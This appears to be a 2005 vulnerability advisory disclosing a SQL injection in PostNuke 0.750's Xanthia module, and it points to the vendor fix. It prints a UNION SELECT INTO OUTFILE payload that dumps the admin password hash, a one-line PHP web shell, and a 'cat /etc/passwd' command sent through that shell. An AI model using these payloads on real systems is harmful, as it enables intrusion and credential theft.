[PostNuke SQL Injection 0.750=>x cXIb8O3.5]

Author: cXIb8O3
Date: 2.3.2005
from CXSecurity.Com

- --- 0.Description ---

PostNuke: The Phoenix Release (0.750)

PostNuke is an open source, open developement content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
Or at the Community Forums located at:

- --- 1. Sql Injection ---
This sql injection exist in modules/Xanthia/pnclasses/Xanthia.php on line 977 on function init_template()

Vulnerabilities code:
- -965-980---
$sql = "SELECT $blcontrolcolumn[blocktemplate] as blocktemplate,
$blcontrolcolumn[identi] as identi
FROM $pntable[theme_blcontrol]
WHERE $blcontrolcolumn[theme]='$theme'
AND $blcontrolcolumn[module]='$mod'
AND $blcontrolcolumn[blocktemplate] !=''";

// Execute the query
$result =& $dbconn->Execute($sql);

$blocktemplates = array();
while(!$result->EOF) {
$row = $result->GetRowAssoc(false);
$blocktemplates[] = $row;
- -965-980---

Error exists in varible $mod =>(GET) name.
But you don't can see result..

If you are user right and have you function init_template() active go to:


Error message :
- ---------------
Fatal error: Call to a member function GetRowAssoc() on a non-object in
/www/PostNuke-0.750/source/html/modules/Xanthia/pnclasses/Xanthia.php on line 977
- ---------------



Error message :
- ---------------
Fatal error: Call to a member function MoveNext() on a non-object in
/www/PostNuke-0.750/html/modules/Xanthia/pnclasses/Xanthia.php on line 977
- ---------------

Ok. Frist exploit.

Exploit 0[GET Admin Pass]
Chech dir for PostNuke.


Error message :
- ---------------
Fatal error: Call to a member function GetRowAssoc() on a non-object in
/www/PostNuke-0.750/source/html/modules/Xanthia/pnclasses/Xanthia.php on line 977
- ---------------

For exemple prefix is /www/PostNuke-0.750/source/html/.
Now you can make exploit. But you have to know db prefix.


and error messege is:

Error message :
- ---------------
Failed to load module Xanthia' UNION SELECT pn_uname,pn_pass FROM pn__users WHERE pn_uid=2 INTO OUTFILE
'/www/PostNuke-0.750/source/html/pnTemp/Xanthia_cache/cXIb8O3'/* (at function: "view")
- ---------------

But go now to


and have you password for user with id=2.

Exploit1[Blind upload]
Go to:


and insert to "Extra information" php code. For exemeple:

- ---
<?php system($_GET[cXIb8O3]); ?>
- ---

And now you can make php script with this code. For exemple:


and go to:

http://[HOST]/[DIR]/pnTemp/Xanthia_cache/cXIb8O3.php?cXIb8O3=cat /etc/passwd

- --- 2. How to fix ---
PNSA 2005-2
Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)
SHA1: 6e76d92124c833618d02dfdb87d699374120967d
MD5: a007e741be11389a986b1d8928a6c0e5
Size: 160550 Bytes

or CVS

- --- 3. Greets ---


- --- 4.Contact ---
Author: Maksymilian Arciemowicz